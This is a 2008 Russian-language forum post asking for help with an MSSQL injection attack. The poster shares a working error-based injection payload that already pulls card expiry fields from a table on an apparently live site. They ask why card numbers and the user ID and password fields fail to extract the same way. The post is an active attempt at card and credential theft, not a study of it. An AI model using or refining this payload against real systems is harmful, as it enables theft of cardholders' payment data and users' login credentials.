Тема: mssql inj help
Показать сообщение отдельно

  #57  
Старый 06.08.2008, 09:04
cyberia
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме:
78255

Репутация: 0
По умолчанию

задам тут свой вопрос.

таблица NAMES содержит поля:
---
EXP_MO
EXP_YR
CARD_NUM
---

EXP_MO и EXP_YR успешно выводятся запросом:
1%20or%201=(select+TOP+1+cast(EXP_MO+as+nvarchar)% 2Bchar(97)+FROM+NAMES)--

а вот CARD_NUM при таком же запросе просто перезагружает страницу без ошибки.
почему? могут быть в таблицах защищённые поля, которые не выводятся?

с полями NM_USERID и NM_PASSWORD такая же фигня происходит. хотя другие поля с именами, адресами и прочим выводятся без проблем.
 
Ответить с цитированием